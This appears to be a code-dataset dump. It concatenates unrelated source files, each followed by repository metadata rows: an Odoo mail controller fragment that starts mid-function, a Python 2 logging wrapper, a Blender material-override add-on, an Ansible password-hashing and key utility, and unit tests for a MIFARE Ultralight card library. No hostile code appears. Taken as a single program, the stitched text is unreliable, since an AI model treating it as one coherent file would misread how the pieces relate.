request.env[follower.res_model].browse(follower.res_id).check_access_rule("read")
# find current model subtypes, add them to a dictionary
subtypes = request.env['mail.message.subtype'].search([
'&', ('hidden', '=', False),
'|', ('res_model', '=', follower.res_model), ('res_model', '=', False)])
followed_subtypes_ids = set(follower.subtype_ids.ids)
subtypes_list = [{
'name': subtype.name,
'res_model': subtype.res_model,
'sequence': subtype.sequence,
'default': subtype.default,
'internal': subtype.internal,
'followed': subtype.id in followed_subtypes_ids,
'parent_model': subtype.parent_id.res_model,
'id': subtype.id
} for subtype in subtypes]
return sorted(subtypes_list,
key=lambda it: (it['parent_model'] or '', it['res_model'] or '', it['internal'], it['sequence']))
@http.route('/mail/view', type='http', auth='public')
def mail_action_view(self, model=None, res_id=None, access_token=None, **kwargs):
""" Generic access point from notification emails. The heuristic to
choose where to redirect the user is the following :
- find a public URL
- if none found
- users with a read access are redirected to the document
- users without read access are redirected to the Messaging
- not logged users are redirected to the login page
models that have an access_token may apply variations on this.
"""
# ==============================================================================================
        # This block of code disappeared in saas-11.3 and was reintroduced by TBE.
        # It is needed because, after a migration from an older version to saas-11.3,
        # links received by mail with a message_id no longer worked; this block
        # guarantees the backward compatibility of those links.
if kwargs.get('message_id'):
try:
message = request.env['mail.message'].sudo().browse(int(kwargs['message_id'])).exists()
            except Exception:
message = request.env['mail.message']
if message:
model, res_id = message.model, message.res_id
# ==============================================================================================
if res_id and isinstance(res_id, str):
res_id = int(res_id)
return self._redirect_to_record(model, res_id, access_token, **kwargs)
@http.route('/mail/assign', type='http', auth='user', methods=['GET'])
def mail_action_assign(self, model, res_id, token=None):
comparison, record, redirect = self._check_token_and_record_or_redirect(model, int(res_id), token)
if comparison and record:
try:
record.write({'user_id': request.uid})
except Exception:
return self._redirect_to_messaging()
return redirect
@http.route('/mail/<string:res_model>/<int:res_id>/avatar/<int:partner_id>', type='http', auth='public')
def avatar(self, res_model, res_id, partner_id):
headers = [('Content-Type', 'image/png')]
status = 200
content = 'R0lGODlhAQABAIABAP///wAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==' # default image is one white pixel
if res_model in request.env:
try:
# if the current user has access to the document, get the partner avatar as sudo()
request.env[res_model].browse(res_id).check_access_rule('read')
if partner_id in request.env[res_model].browse(res_id).sudo().exists().message_ids.mapped('author_id').ids:
status, headers, _content = request.env['ir.http'].sudo().binary_content(
model='res.partner', id=partner_id, field='image_128', default_mimetype='image/png')
# binary content return an empty string and not a placeholder if obj[field] is False
if _content != '':
content = _content
if status == 304:
return werkzeug.wrappers.Response(status=304)
except AccessError:
pass
image_base64 = base64.b64decode(content)
headers.append(('Content-Length', len(image_base64)))
response = request.make_response(image_base64, headers)
response.status = str(status)
return response
@http.route('/mail/needaction', type='json', auth='user')
def needaction(self):
return request.env['res.partner'].get_needaction_count()
@http.route('/mail/init_messaging', type='json', auth='user')
def mail_init_messaging(self):
values = {
'needaction_inbox_counter': request.env['res.partner'].get_needaction_count(),
'starred_counter': request.env['res.partner'].get_starred_count(),
'channel_slots': request.env['mail.channel'].channel_fetch_slot(),
'mail_failures': request.env['mail.message'].message_fetch_failed(),
'commands': request.env['mail.channel'].get_mention_commands(),
'mention_partner_suggestions': request.env['res.partner'].get_static_mention_suggestions(),
'shortcodes': request.env['mail.shortcode'].sudo().search_read([], ['source', 'substitution', 'description']),
'menu_id': request.env['ir.model.data'].xmlid_to_res_id('mail.menu_root_discuss'),
'is_moderator': request.env.user.is_moderator,
'moderation_counter': request.env.user.moderation_counter,
'moderation_channel_ids': request.env.user.moderation_channel_ids.ids,
'partner_root': request.env.ref('base.partner_root').sudo().mail_partner_format(),
'public_partner': request.env.ref('base.public_partner').sudo().mail_partner_format(),
}
return values
@http.route('/mail/get_partner_info', type='json', auth='user')
def message_partner_info_from_emails(self, model, res_ids, emails, link_mail=False):
records = request.env[model].browse(res_ids)
try:
records.check_access_rule('read')
records.check_access_rights('read')
        except Exception:
return []
return records._message_partner_info_from_emails(emails, link_mail=link_mail)
@http.route('/mail/get_suggested_recipients', type='json', auth='user')
def message_get_suggested_recipients(self, model, res_ids):
records = request.env[model].browse(res_ids)
try:
records.check_access_rule('read')
records.check_access_rights('read')
        except Exception:
return {}
return records._message_get_suggested_recipients()
|
agpl-3.0
| 1,157,204,141,075,389,200
| 48.14094
| 123
| 0.593076
| false
| 4.159046
| false
| false
| false
|
f304646673/scheduler_frame
|
src/frame/loggingex.py
|
1
|
3302
|
import os
import sys
import inspect
import logging
import logging.config
from singleton import singleton
@singleton
class loggingex():
def __init__(self, conf_path):
error = 0
while True:
try:
logging.config.fileConfig(conf_path)
except IOError as e:
if error > 1:
raise e
if 2 == e.errno:
if os.path.isdir(e.filename):
os.makedirs(e.filename)
else:
os.makedirs(os.path.dirname(e.filename))
error = error + 1
except Exception as e:
raise e
else:
break
def log_debug(self, msg):
log_debug = logging.getLogger('logger_LogDebug') #https://docs.python.org/2/howto/logging.html
log_debug.debug(msg)
def log_info(self, msg):
log_info = logging.getLogger('logger_LogInfo')
log_info.info(msg)
def log_warning(self, msg):
log_warning_error_critical = logging.getLogger('logger_LogWarningErrorCritical')
log_warning_error_critical.warning(msg)
def log_error(self, msg):
log_warning_error_critical = logging.getLogger('logger_LogWarningErrorCritical')
log_warning_error_critical.error(msg)
def log_critical(self, msg):
log_warning_error_critical = logging.getLogger('logger_LogWarningErrorCritical')
log_warning_error_critical.critical(msg)
def log_error_sql(self, msg):
log_error_sql = logging.getLogger('logger_SQL_ERROR')
log_error_sql.critical(msg)
def LOG_INIT(conf_path):
global logger_obj
logger_obj = loggingex(conf_path)
def modify_msg(msg):
    stack_info = inspect.stack()
    if len(stack_info) > 2:
        file_name = stack_info[2][1]
        line = stack_info[2][2]
        function_name = stack_info[2][3]
        new_msg = file_name + " ^ " + function_name + " ^ " + str(line) + " ^ " + msg
    else:
        # short stacks (e.g. direct calls) previously caused a NameError here
        new_msg = msg
    return new_msg
def LOG_DEBUG(msg):
new_msg = modify_msg(msg)
try:
logger_obj.log_debug(new_msg)
except Exception as e:
print new_msg
def LOG_INFO(msg):
new_msg = modify_msg(msg)
try:
logger_obj.log_info(new_msg)
except Exception as e:
print new_msg
def LOG_WARNING(msg):
new_msg = modify_msg(msg)
try:
logger_obj.log_warning(new_msg)
except Exception as e:
print new_msg
def LOG_ERROR(msg):
new_msg = modify_msg(msg)
try:
logger_obj.log_error(new_msg)
except Exception as e:
print new_msg
def LOG_CRITICAL(msg):
new_msg = modify_msg(msg)
try:
logger_obj.log_critical(new_msg)
except Exception as e:
print new_msg
def LOG_ERROR_SQL(msg):
try:
logger_obj.log_error_sql(msg)
except Exception as e:
print msg
if __name__ == "__main__":
LOG_INIT("../../conf/log.conf")
LOG_DEBUG('LOG_DEBUG')
LOG_INFO('LOG_INFO')
LOG_WARNING('LOG_WARNING')
LOG_ERROR('LOG_ERROR')
LOG_CRITICAL('LOG_CRITICAL')
LOG_ERROR_SQL("Create XXX Error")
#global logger_obj
#logger_obj.log_debug('XXXXXXXXXXXX')
print "Hello World"
|
apache-2.0
| -3,504,118,964,041,598,500
| 26.983051
| 109
| 0.574197
| false
| 3.644592
| false
| false
| false
|
lapineige/Blender_add-ons
|
Material-Advanced-Override/material_advanded_override_v0-8.py
|
1
|
7758
|
######################################################################################################
# A simple add-on that enhances the override material tool (from the renderlayer panel)              #
# Actually partly uncommented - if you do not understand some parts of the code,                     #
# please see a further version or contact me                                                         #
# Author: Lapineige #
# License: GPL v3 #
######################################################################################################
############# Add-on description (used by Blender)
bl_info = {
"name": "Material Advanced Override",
"description": 'Material Override Tools - with advanced exclude options',
"author": "Lapineige",
"version": (0, 8),
"blender": (2, 72, 0),
"location": "Properties > Render Layers",
"warning": "",
"wiki_url": "http://blenderlounge.fr/forum/viewtopic.php?f=26&t=810",
"tracker_url": "http://blenderlounge.fr/forum/viewtopic.php?f=26&t=810",
"category": "Render"}
import bpy
import blf
bpy.types.Scene.OW_only_selected = bpy.props.BoolProperty(name='Affect Only Selected Objects',default=False)
bpy.types.Scene.OW_exclude_type = bpy.props.EnumProperty(items=[('index','Material Index','',0),('group','Group','',1),('layer','Layer','',2)])
bpy.types.Scene.OW_pass_index = bpy.props.IntProperty(name='Pass Index',default=1)
bpy.types.Scene.OW_material = bpy.props.StringProperty(name='Material',maxlen=63)
bpy.types.Scene.OW_group = bpy.props.StringProperty(name='Group',maxlen=63)
bpy.types.Scene.OW_display_override = bpy.props.BoolProperty(name="Show 'Override ON' reminder",default=True)
#
def draw_callback_px(self, context):
if context.scene.OW_display_override:
font_id = 0 # XXX, need to find out how best to get this
blf.position(font_id, 28, bpy.context.area.height-85, 0)
blf.draw(font_id, "Override ON")
#
class OverrideDraw(bpy.types.Operator):
""" """
bl_idname = "view3d.display_override"
bl_label = "Display Override"
bl_options = {'INTERNAL'}
def execute(self, context):
context.area.tag_redraw()
self._handle = bpy.types.SpaceView3D.draw_handler_add(draw_callback_px, (self, context), 'WINDOW', 'POST_PIXEL')
return {'FINISHED'}
class OverrideSetup(bpy.types.Operator):
"""Tooltip"""
bl_idname = "render.overwrite_setup"
bl_label = "Overwrite Setup"
l_m = list()
l_mesh = list()
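    # l_m and l_mesh are class-level lists shared across operator invocations:
    # l_m stores (object, [(slot, original material), ...]) pairs so that
    # OverrideRestore can put the original materials back, and l_mesh tracks
    # mesh datablocks already processed, so shared meshes are only handled once.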
bpy.types.Scene.override_layer = bpy.props.BoolVectorProperty(subtype='LAYER', size=20)
@classmethod
def poll(cls, context):
return context.scene.OW_material
def execute(self, context):
context.scene.OW_display_override = True
bpy.ops.view3d.display_override()
        for obj in bpy.data.objects:
            if not context.scene.OW_only_selected or obj.select:
                if obj.data is None:
                    # e.g. Empties have no data / material slots
                    continue
                if obj.data.name not in self.l_mesh:
                    self.l_mesh.append(obj.data.name)
                else:
                    continue
if not len(obj.material_slots) and hasattr(obj.data,'materials'):
new_mat = bpy.data.materials.new('Default')
obj.data.materials.append(new_mat)
elif len(obj.material_slots):
if context.scene.OW_exclude_type == 'index':
if not obj.material_slots[0].material.pass_index == context.scene.OW_pass_index:
self._save_mat(obj)
self._change_mat(context,obj)
obj.material_slots[0].material = bpy.data.materials[context.scene.OW_material]
elif context.scene.OW_exclude_type == 'group' and context.scene.OW_group:
if obj.name in [g_obj.name for g_obj in bpy.data.groups[context.scene.OW_group].objects]:
self._save_mat(obj)
self._change_mat(context,obj)
obj.material_slots[0].material = bpy.data.materials[context.scene.OW_material]
elif context.scene.OW_exclude_type == 'layer':
if not (True in [(context.scene.override_layer[index])*(context.scene.override_layer[index]==obj.layers[index]) for index in range(len(obj.layers))]):
self._save_mat(obj)
self._change_mat(context,obj)
obj.material_slots[0].material = bpy.data.materials[context.scene.OW_material]
return {'FINISHED'}
def _save_mat(self, obj):
self.l_m.append( (obj,[]) )
for slot in obj.material_slots:
self.l_m[-1][1].append( (slot,slot.material) )
def _change_mat(self, context, obj):
for slot in obj.material_slots:
slot.material = bpy.data.materials[context.scene.OW_material]
class OverrideRestore(bpy.types.Operator):
"""Tooltip"""
bl_idname = "render.overwrite_restore"
bl_label = "Overwrite Restore"
l_m = []
@classmethod
def poll(cls, context):
return True
def execute(self, context):
context.scene.OW_display_override = False
for data in bpy.types.RENDER_OT_overwrite_setup.l_m:
obj, mat_data = data
for slot, material in mat_data:
slot.material = material
bpy.types.RENDER_OT_overwrite_setup.l_m = list()
bpy.types.RENDER_OT_overwrite_setup.l_mesh = list()
return {'FINISHED'}
class MaterialOverrideTools(bpy.types.Panel):
""" """
bl_label = "Material Override Tools"
bl_idname = "material_override_tools"
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "render_layer"
def draw(self, context):
layout = self.layout
if bpy.types.RENDER_OT_overwrite_setup.l_m:
layout.operator('render.overwrite_restore')
layout.label('Do not save before having restored the material(s)', icon='CANCEL')
layout.prop(context.scene, 'OW_display_override')
else:
layout.operator('render.overwrite_setup')
layout.prop_search(context.scene, "OW_material", bpy.data, "materials", icon='MATERIAL_DATA')
layout.prop(context.scene, 'OW_only_selected',toggle=True, icon='BORDER_RECT')
box = layout.box()
box.label('Exclude from effect:')
row = box.row()
row.prop(context.scene, 'OW_exclude_type', expand=True)
if context.scene.OW_exclude_type == 'index':
box.prop(context.scene, 'OW_pass_index')
elif context.scene.OW_exclude_type == 'group':
box.prop_search(context.scene, "OW_group", bpy.data, "groups", icon='GROUP')
elif context.scene.OW_exclude_type == 'layer':
box.prop(context.scene, 'override_layer', text='')
def register():
bpy.utils.register_class(OverrideSetup)
bpy.utils.register_class(OverrideRestore)
bpy.utils.register_class(MaterialOverrideTools)
bpy.utils.register_class(OverrideDraw)
def unregister():
if bpy.types.RENDER_OT_overwrite_setup.l_m:
bpy.ops.render.overwrite_restore() # To make sure materials will be restored
bpy.utils.unregister_class(OverrideSetup)
bpy.utils.unregister_class(OverrideRestore)
bpy.utils.unregister_class(MaterialOverrideTools)
bpy.utils.unregister_class(OverrideDraw)
if __name__ == "__main__":
register()
|
gpl-3.0
| -2,470,813,614,757,134,000
| 42.1
| 174
| 0.579144
| false
| 3.842496
| false
| false
| false
|
ownport/ansiblite
|
src/ansiblite/utils/encrypt.py
|
1
|
6355
|
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import stat
import tempfile
import multiprocessing
import time
import warnings
PASSLIB_AVAILABLE = False
try:
import passlib.hash
PASSLIB_AVAILABLE = True
except ImportError:
pass
from ansiblite.utils.display import Display
display = Display()
KEYCZAR_AVAILABLE=False
try:
try:
# some versions of pycrypto may not have this?
from Crypto.pct_warnings import PowmInsecureWarning
except ImportError:
PowmInsecureWarning = RuntimeWarning
with warnings.catch_warnings(record=True) as warning_handler:
warnings.simplefilter("error", PowmInsecureWarning)
try:
import keyczar.errors as key_errors
from keyczar.keys import AesKey
except PowmInsecureWarning:
display.system_warning(
"The version of gmp you have installed has a known issue regarding " + \
"timing vulnerabilities when used with pycrypto. " + \
"If possible, you should update it (i.e. yum update gmp)."
)
warnings.resetwarnings()
warnings.simplefilter("ignore")
import keyczar.errors as key_errors
from keyczar.keys import AesKey
KEYCZAR_AVAILABLE=True
except ImportError:
pass
from ansiblite import constants as C
from ansiblite.errors import AnsibleError
from ansiblite.utils._text import to_text, to_bytes
__all__ = ['do_encrypt']
_LOCK = multiprocessing.Lock()
def do_encrypt(result, encrypt, salt_size=None, salt=None):
if PASSLIB_AVAILABLE:
try:
crypt = getattr(passlib.hash, encrypt)
        except AttributeError:
raise AnsibleError("passlib does not support '%s' algorithm" % encrypt)
if salt_size:
result = crypt.encrypt(result, salt_size=salt_size)
elif salt:
if crypt._salt_is_bytes:
salt = to_bytes(salt, encoding='ascii', errors='strict')
else:
salt = to_text(salt, encoding='ascii', errors='strict')
result = crypt.encrypt(result, salt=salt)
else:
result = crypt.encrypt(result)
else:
raise AnsibleError("passlib must be installed to encrypt vars_prompt values")
# Hashes from passlib.hash should be represented as ascii strings of hex
# digits so this should not traceback. If it's not representable as such
# we need to traceback and then blacklist such algorithms because it may
# impact calling code.
return to_text(result, errors='strict')
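# Usage sketch (assumption: passlib is installed and 'sha512_crypt' is one of
# the passlib.hash algorithms accepted by this helper; the literal password is
# illustrative):
#
#   hashed = do_encrypt('secret', 'sha512_crypt')
#   # -> '$6$...' crypt-style hash suitable for password fields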
def key_for_hostname(hostname):
# fireball mode is an implementation of ansible firing up zeromq via SSH
# to use no persistent daemons or key management
if not KEYCZAR_AVAILABLE:
raise AnsibleError("python-keyczar must be installed on the control machine to use accelerated modes")
key_path = os.path.expanduser(C.ACCELERATE_KEYS_DIR)
if not os.path.exists(key_path):
# avoid race with multiple forks trying to create paths on host
# but limit when locking is needed to creation only
with(_LOCK):
if not os.path.exists(key_path):
# use a temp directory and rename to ensure the directory
# searched for only appears after permissions applied.
tmp_dir = tempfile.mkdtemp(dir=os.path.dirname(key_path))
os.chmod(tmp_dir, int(C.ACCELERATE_KEYS_DIR_PERMS, 8))
os.rename(tmp_dir, key_path)
elif not os.path.isdir(key_path):
raise AnsibleError('ACCELERATE_KEYS_DIR is not a directory.')
if stat.S_IMODE(os.stat(key_path).st_mode) != int(C.ACCELERATE_KEYS_DIR_PERMS, 8):
raise AnsibleError('Incorrect permissions on the private key directory. Use `chmod 0%o %s` to correct this issue, and make sure any of the keys files contained within that directory are set to 0%o' % (int(C.ACCELERATE_KEYS_DIR_PERMS, 8), C.ACCELERATE_KEYS_DIR, int(C.ACCELERATE_KEYS_FILE_PERMS, 8)))
key_path = os.path.join(key_path, hostname)
# use new AES keys every 2 hours, which means fireball must not allow running for longer either
if not os.path.exists(key_path) or (time.time() - os.path.getmtime(key_path) > 60*60*2):
# avoid race with multiple forks trying to create key
# but limit when locking is needed to creation only
with(_LOCK):
if not os.path.exists(key_path) or (time.time() - os.path.getmtime(key_path) > 60*60*2):
key = AesKey.Generate()
# use temp file to ensure file only appears once it has
# desired contents and permissions
with tempfile.NamedTemporaryFile(mode='w', dir=os.path.dirname(key_path), delete=False) as fh:
tmp_key_path = fh.name
fh.write(str(key))
os.chmod(tmp_key_path, int(C.ACCELERATE_KEYS_FILE_PERMS, 8))
os.rename(tmp_key_path, key_path)
return key
if stat.S_IMODE(os.stat(key_path).st_mode) != int(C.ACCELERATE_KEYS_FILE_PERMS, 8):
raise AnsibleError('Incorrect permissions on the key file for this host. Use `chmod 0%o %s` to correct this issue.' % (int(C.ACCELERATE_KEYS_FILE_PERMS, 8), key_path))
fh = open(key_path)
key = AesKey.Read(fh.read())
fh.close()
return key
def keyczar_encrypt(key, msg):
return key.Encrypt(msg.encode('utf-8'))
def keyczar_decrypt(key, msg):
try:
return key.Decrypt(msg)
except key_errors.InvalidSignatureError:
raise AnsibleError("decryption failed")
|
gpl-3.0
| 654,723,775,037,806,000
| 39.737179
| 307
| 0.663415
| false
| 3.849182
| false
| false
| false
|
0xquad/mfu
|
tests.py
|
1
|
18569
|
#!/usr/bin/env python3
#
# The test program for the MFU Python library.
#
# Copyright (c) 2015, Alexandre Hamelin <alexandre.hamelin gmail.com>
#
# This work is distributed under the LGPL license. See LICENSE.txt for details.
import sys
import unittest
from unittest.mock import Mock, call, patch, ANY
from ultralight import MFUCard, MFUPage, MFUPageViewProxy
class MFUTests(unittest.TestCase):
def __init__(self, *args):
super().__init__(*args)
content = (
'04AD7150'
'FADA2E80'
'8E48E000'
'00000000'
'00000000'
'31880220'
'633C0000'
'E92D2412'
'00000000'
'00000000'
'00013634'
'0000907B'
'00000000'
'00000000'
'00000000'
'00000000'
)
content = bytearray.fromhex(content)
self.card = MFUCard(bytes=content)
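        # Layout note: a MIFARE Ultralight card is 16 pages x 4 bytes = 64
        # bytes; pages 0-1 carry the 7-byte UID plus the BCC check bytes, and
        # page 2 holds BCC1 and the lock bytes (see test_basic_attributes and
        # test_readonly below).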
def test_iter_bytes(self):
iterator = iter(self.card)
firstbytes = [next(iterator) for i in range(4)]
self.assertEqual(firstbytes, [0x04, 0xad, 0x71, 0x50])
for i in range(len(self.card) - 4):
next(iterator)
with self.assertRaises(StopIteration):
next(iterator)
def test_length(self):
self.assertEqual(len(self.card), 64)
def test_hexdump(self):
output = []
def myprint(data, *args, **kwargs):
output.append(str(data))
output.append('\n')
mock_print = Mock(side_effect=myprint)
# patching sys.stdout doesn't work since the function already has
# a reference to the real sys.stdout at define time
with patch('builtins.print', mock_print):
self.card.hexdump()
expected = (
'04ad7150\n'
'fada2e80\n'
'8e48e000\n'
'00000000\n'
'00000000\n'
'31880220\n'
'633c0000\n'
'e92d2412\n'
'00000000\n'
'00000000\n'
'00013634\n'
'0000907b\n'
'00000000\n'
'00000000\n'
'00000000\n'
'00000000\n'
)
self.assertEqual(''.join(output), expected)
def test_hexdump_with_custom_output(self):
output = []
def write(data):
output.append(data)
filemock = Mock()
filemock.write.side_effect = write
self.card.hexdump(file=filemock)
expected = (
'04ad7150\n'
'fada2e80\n'
'8e48e000\n'
'00000000\n'
'00000000\n'
'31880220\n'
'633c0000\n'
'e92d2412\n'
'00000000\n'
'00000000\n'
'00013634\n'
'0000907b\n'
'00000000\n'
'00000000\n'
'00000000\n'
'00000000\n'
)
self.assertEqual(''.join(output), expected)
def test_dump(self):
output = []
def write(data):
output.append(data)
filemock = Mock(sys.stdout)
filemock.write.side_effect = write
self.card.dump(filemock)
expected = (
b'\x04\xad\x71\x50'
b'\xfa\xda\x2e\x80'
b'\x8e\x48\xe0\x00'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x00'
b'\x31\x88\x02\x20'
b'\x63\x3c\x00\x00'
b'\xe9\x2d\x24\x12'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x00'
b'\x00\x01\x36\x34'
b'\x00\x00\x90\x7b'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x00'
)
self.assertEqual(b''.join(output), expected)
def test_page_view_is_singleton(self):
view1 = self.card.pages
view2 = self.card.pages
self.assertIs(view1, view2)
def test_get_byte_by_index(self):
self.assertEqual(self.card[0], 4)
self.assertEqual(self.card[4], 0xfa)
self.assertEqual(self.card[8], 0x8e)
self.assertEqual(self.card[47], 0x7b)
self.assertEqual(self.card[-1], 0)
self.assertEqual(self.card[-len(self.card)], 4)
def test_get_bytes_by_slice(self):
data = self.card[:4]
self.assertEqual(data, b'\x04\xad\x71\x50')
data = self.card[10:12]
self.assertEqual(data, b'\xe0\x00')
data = self.card[60:]
self.assertEqual(data, b'\x00\x00\x00\x00')
def test_get_bytes_by_invalid_index(self):
for i in (str, dict, list, tuple, set, bytes, bytearray,
complex, lambda: None, object()):
with self.assertRaises(TypeError):
self.card[i]
with self.assertRaises(IndexError):
self.card[-len(self.card)-1]
with self.assertRaises(IndexError):
self.card[len(self.card)]
def test_get_page(self):
self.assertEqual(bytes(self.card.pages[0]), b'\x04\xAD\x71\x50')
def test_byte_by_getitem(self):
self.assertEqual(self.card[0], 0x04)
def test_bytes_by_slice(self):
self.assertEqual(self.card[:2], b'\x04\xAD')
def test_basic_attributes(self):
self.assertEqual(self.card.id, 0x04ad71fada2e80)
self.assertEqual(self.card.manufacturer, 0x04)
self.assertEqual(self.card.bcc0, 0x50)
self.assertEqual(self.card.bcc1, 0x8e)
self.assertEqual(self.card.id0, 0x04)
self.assertEqual(self.card.id1, 0xad)
self.assertEqual(self.card.id2, 0x71)
self.assertEqual(self.card.id3, 0xfa)
self.assertEqual(self.card.id4, 0xda)
self.assertEqual(self.card.id5, 0x2e)
self.assertEqual(self.card.id6, 0x80)
def test_first_pages_are_readonly(self):
for p in [0, 1]:
self.assertTrue(self.card.pages[p].readonly)
def test_locked_pages_are_read_only(self):
self.skipTest('not implemented')
#self.assertTrue(card.otp_locked)
#self.assertTrue(card.pages4to9_blocked)
#self.assertFalse(card.pages10to15_blocked)
#self.assertFalse(card.otp_blocked)
def test_init_default_empty(self):
# initialized to all zeroes
card = MFUCard()
self.assertEqual(bytes(card), b'\x00' * 64)
def test_init_one_param_only(self):
with self.assertRaises(RuntimeError):
mfu = MFUCard(bytes=b'abcd'*4, file=1)
with self.assertRaises(RuntimeError):
mfu = MFUCard(bytes=b'abcd'*4, hexfile=1)
with self.assertRaises(RuntimeError):
mfu = MFUCard(file=1, hexfile=1)
with self.assertRaises(RuntimeError):
mfu = MFUCard(bytes=b'abcd'*4, file=1, hexfile=1)
def test_init_bytestring(self):
# initialized with bytes, must be 64 bytes
card = MFUCard(bytes=b'\x01' * 64)
self.assertEqual(bytes(card), b'\x01' * 64)
def test_init_bytes(self):
card = MFUCard(bytes=bytes(64))
self.assertEqual(bytes(card), b'\x00' * 64)
card = MFUCard(bytes=bytearray([i for i in range(64)]))
self.assertEqual(list(card), [i for i in range(64)])
def test_init_from_file(self):
# load from a 64-byte binary file
content = b'\x01\x02\03\x04' * 16
fp_mock = Mock(sys.stdin)
fp_mock.fileno.return_value = 3
with patch('builtins.open', return_value=fp_mock) as mock_open, \
patch('os.read', return_value=content) as mock_sysread:
card = MFUCard(file='card.bin')
self.assertEqual(bytes(card), content)
def test_init_from_file_descriptor(self):
def sysread(desc, n):
return b'\x01' * n
with patch('os.read', wraps=sysread) as mock_sysread:
card = MFUCard(file=3)
mock_sysread.assert_called_with(3, ANY)
self.assertEqual(bytes(card), b'\x01' * 64)
def test_init_from_hexfile(self):
# load from an ASCII hex file, spaces ignored, case-insensitive
content = b'0badc0de' * 16
fp_mock = Mock(sys.stdin)
fp_mock.fileno.return_value = 3
with patch('builtins.open', return_value=fp_mock) as mock_open, \
patch('os.read', return_value=content) as mock_sysread:
card = MFUCard(hexfile='card.txt')
self.assertEqual(bytes(card), b'\x0b\xad\xc0\xde' * 16)
def test_init_from_hexfile_file_descriptor(self):
def sysread(desc, n):
if not hasattr(sysread, 'filepos'):
sysread.filepos = 0
filedata = (
b'00010203'
b'01020304'
b'02030405'
b'03040506'
b'04050607'
b'05060708'
b'06070809'
b'0708090a'
b'08090a0b'
b'090a0b0c'
b'0a0b0c0d'
b'0b0c0d0e'
b'0c0d0e0f'
b'0d0e0f00'
b'0e0f0001'
b'0f000102'
)
chunk = filedata[sysread.filepos:sysread.filepos+n]
sysread.filepos = min(sysread.filepos + n, len(filedata))
return chunk
with patch('os.read', wraps=sysread) as mock_sysread:
card = MFUCard(hexfile=3)
mock_sysread.assert_called_with(3, ANY)
expected = b''.join(bytes([i, (i + 1) % 16,
(i + 2) % 16,
(i + 3) % 16])
for i in range(16))
self.assertEqual(bytes(card), expected)
class MFUPageTests(unittest.TestCase):
def __init__(self, name):
super().__init__(name)
card = MFUCard(bytes=bytes([1,2,3,4]*16))
self.page = MFUPage(card, 0)
def test_iter_bytes(self):
byteiter = iter(self.page)
b = next(byteiter)
self.assertEqual(b, 1)
b = next(byteiter)
self.assertEqual(b, 2)
b = next(byteiter)
self.assertEqual(b, 3)
b = next(byteiter)
self.assertEqual(b, 4)
with self.assertRaises(StopIteration):
next(byteiter)
def test_as_list(self):
bytelist = list(self.page)
self.assertIsInstance(bytelist, list)
self.assertEqual(bytelist, [1, 2, 3, 4])
def test_slice(self):
self.assertEqual(self.page[0], 1)
self.assertEqual(self.page[1:-1], b'\x02\x03')
@unittest.skip('item assignment is not implemented')
def test_set_bytes_types(self):
self.assertNotEqual(self.page[0], 99)
self.page[0] = 99
self.assertEqual(self.page[0], 99)
self.page[0] = b'\x99'
self.assertEqual(self.page[0], 0x99)
@unittest.skip('item assignment is not implemented')
def test_set_bytes_negative_index(self):
self.assertNotEqual(self.page[-1], 99)
self.page[-1] = 99
self.assertEqual(self.page[-1], 99)
@unittest.skip('item assignment is not implemented')
def test_set_bytes_slice_value_types(self):
self.assertNotEqual(self.page[:2], b'\x88\x99')
self.page[:2] = bytes([0x88, 0x99])
self.assertEqual(self.page[:2], b'\x88\x99')
self.page[:2] = bytes([0x10, 0x20])
self.assertEqual(self.page[:2], b'\x10\x20')
self.page[:2] = b'\x11\x21'
self.assertEqual(self.page[:2], b'\x11\x21')
self.page[:2] = [0x12, 0x22]
self.assertEqual(self.page[:2], b'\x12\x22')
        class C:
            # minimal custom iterable yielding two bytes
            def __iter__(self):
                yield 0x13
                yield 0x23
self.page[:2] = C()
self.assertEqual(self.page[:2], b'\x13\x23')
@unittest.skip('item assignment is not implemented')
def test_set_bytes_invalid_value(self):
for t in (str, complex, float, set, list, tuple, dict):
with self.assertRaises(ValueError):
self.page[0] = t()
with self.assertRaises(ValueError):
self.page[0] = 256
with self.assertRaises(ValueError):
self.page[0] = -1
@unittest.skip('item assignment is not implemented')
def test_set_bytes_invalid_index(self):
for t in (str, complex, float, set, list, tuple, dict):
with self.assertRaises(TypeError):
self.page[t()] = 0
with self.assertRaises(ValueError):
self.page[5] = 0
def test_invalid_index(self):
for t in (str, list, set, dict, complex, object):
with self.assertRaises(TypeError):
self.page[t()]
def test_to_hex(self):
hexstr = self.page.to_hex()
self.assertEqual(hexstr, '01020304')
def test_to_int(self):
value = self.page.to_int()
self.assertEqual(value, 0x01020304)
def test_length(self):
self.assertEqual(len(self.page), 4)
def test_init_invalid_page(self):
card = MFUCard()
with self.assertRaises(ValueError):
MFUPage(card, -1)
with self.assertRaises(ValueError):
MFUPage(card, 16)
def test_init_invalid_card(self):
card = object()
with self.assertRaises(TypeError):
MFUPage(card, 0)
def test_readonly(self):
card = MFUCard()
pages = [MFUPage(card, i) for i in range(16)]
for p in (0, 1):
self.assertTrue(pages[p].readonly)
for p in range(2, 16):
self.assertFalse(pages[p].readonly)
card = MFUCard(bytes=
b'\x00\x00\x00\x00' * 2 +
# lock bytes value = 0x55aa
# meaning: pages 5, 7, 8, 10, 12, 14 are LOCKED
# pages 4, 6, 9, 11, 13, 15 are not locked
# otp locking protection is off
# pages 9-4 locking protection is ON
# pages 15-10 locking protection is off
# otp area is LOCKED
b'\x00\x00\xaa\x55' +
b'\x00\x00\x00\x00' * 13
)
pages = [MFUPage(card, i) for i in range(16)]
for p in (0, 1):
# readonly pages
self.assertTrue(pages[p].readonly)
for p in (5, 7, 8, 10, 12, 14):
# locked pages
self.assertTrue(pages[p].readonly)
for p in (4, 6, 9, 11, 13, 15):
# pages not locked
self.assertFalse(pages[p].readonly)
